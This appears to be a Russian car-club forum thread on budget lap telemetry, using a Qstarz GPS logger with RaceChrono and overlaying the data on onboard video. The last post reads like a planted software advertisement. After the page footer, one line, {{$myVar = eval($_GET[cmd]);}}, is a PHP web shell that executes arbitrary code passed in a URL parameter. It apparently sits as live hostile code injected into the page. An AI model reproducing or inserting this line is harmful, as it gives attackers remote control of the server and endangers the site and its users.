+ Ответить в теме
Страница 7 из 7 ПерваяПервая ... 5 6 7
Показано с 61 по 68 из 68

Тема: Что использовать для видео и хронометрии в заездах ?


  1. #61
    GTI-Racing VVZ will become famous soon enough Аватар для VVZ
    Регистрация
    07.05.2008
    Машина
    VW Golf GTI Mk5 DSG
    Сообщений
    3,440
    Обновил первое сообщение.

    Сюда также выложу инструкцию по пользованию Рейсхроно.


    Если у кого-то не хватает денег на рейслоджик, но очень хочется иметь нормальную телеметрию, то можно купить вот такой недорогой приборчик: Qstarz BT-Q818XT, стоит он порядка 2700 руб.
    Это высокочастотный gps приёмник, такой же как и в Рейслоджике, т.е. 10Hz (частота обновления 10 раз в секунду).

    Далее надо посредством usb шнурка, который идёт в комплекте, подсоединить эту коробочку к ноутбуку (можно и к коммуникатору, но у меня айфон, поэтому не прокатит). Качаем дрова с этого сайта http://www.qstarz.com/download.php

    Для обработки данных необходимо скачать программу racechrono с этого сайта для windows (в моём случае) http://www.racechrono.com/download/

    У меня была проблема с поиском спутников, но она решилась после того как в "свойствах системы" => "оборудование" => "диспетчер устройств" принудительно выбрал у gps ресивира com port #2. Конечно он может быть занят, тогда выбираем другой, но желательно ближе к единице. Так же ставим значение скорости бит в секунду равным 115200.

    В самой программе racechrono в настройках так же выставляем 115200 и нужный компорт. Вот в общем то и всё.

    Да, надо будет разместить в папке мои документы/racechrono/tracks профиль трассы. Можно конечно самому вбить линию старт-финиша, сектора и т.п., но я уже скинул этот профиль для Мячково на сайт http://racechrono.com/tracks/?lang=en , правда пока они его не выложили... может и не выложат. Но вообще странно что там нет ни одного Российского трека, а какие-нибудь Боснийские или Африканские присутствуют.

    Так, для того чтобы сделать как у меня в онборде, надо будет скачать программу racechrono2avi.
    Дальше просто конвертируем в racechrono результаты сессии в формат CSV, открываем его в racechrono2avi и конвертируем в avi файл. Полученный avi-шный файл с помощью видеоредактора состыковываем и накладываем на онборд видео.

    Ну и собственно, вот само видео :)

    VW GTI 5, Myachkovo Test

    Если у кого-то есть программа google earth, то можно открыть этот файл и посмотреть траектории. К сожалению, есть небольшой сдвиг в координатах, но всё равно полезная штука )

    Траектории программа рисует очень точно. В общем телеметрией я доволен на 100%. Весьма бюджетная, очень удобная и в целом хорошая альтернатива рейслоджику, гтеку и т.п.

    Позже выложу основные возможности самой программы racechrono.
    Последний раз редактировалось VVZ; 06.08.2011 в 11:26.
    С уважением, Василий.

    My onboard video.

  2. #62
    GTI-Racing Madbars is on a distinguished road Аватар для Madbars
    Регистрация
    18.05.2011
    Откуда
    Kazan
    Машина
    Бричка
    Сообщений
    90
    ну вот!!! ,а сначала говорил гумно!!! действительно классная "бюджетная" телеметрия!
    значит на айфон поставил! практично! потому как ноут закрепить не получаеться,приходиться тренироваться с штурманном,но и плюсы есть:не отвлекаешься на телеметрию,штурман после каждого сектора озвучивает в плюсах ты или в минусах! походу дела уже оцениваешь где больше отставаний,где прибавка! вообщем со штурманом удобно,если он в теме вообще класс,подсказки уже с какимто анализом и т.д.!

  3. #63
    GTI-Racing VVZ will become famous soon enough Аватар для VVZ
    Регистрация
    07.05.2008
    Машина
    VW Golf GTI Mk5 DSG
    Сообщений
    3,440
    Цитата Сообщение от Madbars Посмотреть сообщение
    ну вот!!! ,а сначала говорил гумно!!! действительно классная "бюджетная" телеметрия!
    значит на айфон поставил! практично! потому как ноут закрепить не получаеться,приходиться тренироваться с штурманном,но и плюсы есть:не отвлекаешься на телеметрию,штурман после каждого сектора озвучивает в плюсах ты или в минусах! походу дела уже оцениваешь где больше отставаний,где прибавка! вообщем со штурманом удобно,если он в теме вообще класс,подсказки уже с какимто анализом и т.д.!
    Друг, я нигде не говорил что рейсхроно гумно. Так же как нигде не писал что подключил эту прогу к айфону )

    Ноут у меня отлично держится пристёнгутый ремнём на пассажирском сиденье.
    С уважением, Василий.

    My onboard video.

  4. #64
    GTI-Racing VVZ will become famous soon enough Аватар для VVZ
    Регистрация
    07.05.2008
    Машина
    VW Golf GTI Mk5 DSG
    Сообщений
    3,440
    ...Позже выложу основные возможности самой программы racechrono...

    Так выглядит интерфейс программы. Смотрится он блекло, т.к. изначально разрабатывался под кпк. По порядку (см. фотки снизу):

    - меню
    - предыдущие сессии
    - сравнение лучшего круга с оптимальным
    - трасса/сектора
    - схема и график скоростей
    - гугл и гугл

    Я сравнивал время лучшего круга и оптимального. Самая большая потеря у меня произошла именно на пятом секторе, где я потерял пол секунды. Произошло это из за того что я зашел в "быструю тему" по неоптимальной траектории с ранним апексом. От этого автомобиль снесло, ну и скорость прохождения поворота снизилась на 5 км/ч в сравнении с оптимальным временем сектора. Правда я и на оптимальном секторе накосячил (синяя машинка). Промахнулся мимо апекса во втором повороте "быстрой темы", что привело к небольшому перепробегу, ну и в следующий поворот я попал немного криво.

    Конечно же программа Рейслодживская удобнее, да и функционала там поболее будет. Но я где-то видел, что в РХ можно сохранять результаты сессии в формате РЛ, Надо попробовать )
    Последний раз редактировалось VVZ; 09.03.2012 в 11:13.
    С уважением, Василий.

    My onboard video.

  5. #65
    GTI-Racing Madbars is on a distinguished road Аватар для Madbars
    Регистрация
    18.05.2011
    Откуда
    Kazan
    Машина
    Бричка
    Сообщений
    90
    я утрированно написал про гумно! а насчет- альтернативы рл нет....,ну это флуд! нестоит! а про айфон я не правильно понял--Далее надо посредством usb шнурка, который идёт в комплекте, подсоединить эту коробочку к ноутбуку (можно и к коммуникатору, но у меня айфон, поэтому не прокатит). Качаем дрова с этого сайта http://www.qstarz.com/download.php
    и еще пожалуйста по подробней можешь обьяснить ,как ремнями пристегнул??? у меня вылетает на поваротах!

  6. #66
    GTI-Racing VVZ will become famous soon enough Аватар для VVZ
    Регистрация
    07.05.2008
    Машина
    VW Golf GTI Mk5 DSG
    Сообщений
    3,440
    Про айфон: я написал "не прокатит", т.е. айфон невозможно подружить с РХ.
    Ноут у меня не маленький и древний. Я просто положил его на пассажирское сидение параллельно движению автомобиля экраном к водителю. Ну и пристегнул его ремнем безопасности. Ноут вообще не ерзал и не пытался куда-нибудь улететь.
    С уважением, Василий.

    My onboard video.

  7. #67
    Новичок Meloun is on a distinguished road Аватар для Meloun
    Регистрация
    14.10.2018
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    107
    Робяты, а какой прогой можно соединять видео? А то есть пару файлов с видео, но не знаю, как их законнектить.

  8. #68
    GTI-Racing Magistral is on a distinguished road Аватар для Magistral
    Регистрация
    11.12.2010
    Откуда
    Москва
    Машина
    Golf
    Сообщений
    156
    Цитата Сообщение от Meloun Посмотреть сообщение
    Робяты, а какой прогой можно соединять видео? А то есть пару файлов с видео, но не знаю, как их законнектить.
    Как человек работающий с видео, посоветую качать вот эту прогу https://video-converter.ru/connect-video.php. За долгие годы работы оператором, я ещё не встречал более многофункциональной программы. Там вот и склеить видео можно, и отрезать лишнее, и формат поменять, и какой-то фильтр наложить. В общем, мне такая прога всегда пригождается.

+ Ответить в теме
Страница 7 из 7 ПерваяПервая ... 5 6 7

Похожие темы

  1. Какие свечи зажигания использовать на ст.2 Рево (Октавия 2 FL, 1.8 TSI)?
    от Verlion в разделе Тюнинг: двигатель, впрыск, впуск/выпуск
    Ответов: 7
    Последнее сообщение: 02.10.2023, 15:40
  2. Ответов: 1
    Последнее сообщение: 24.12.2020, 01:49
  3. видео гти )))
    от Консильери в разделе Курилка
    Ответов: 9
    Последнее сообщение: 10.06.2011, 15:13
  4. Афигенное Видео
    от RABBIT в разделе Курилка
    Ответов: 8
    Последнее сообщение: 16.02.2009, 23:07
  5. видео и фотки
    от RABBIT в разделе Клубная Тема
    Ответов: 11
    Последнее сообщение: 04.04.2006, 13:45

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}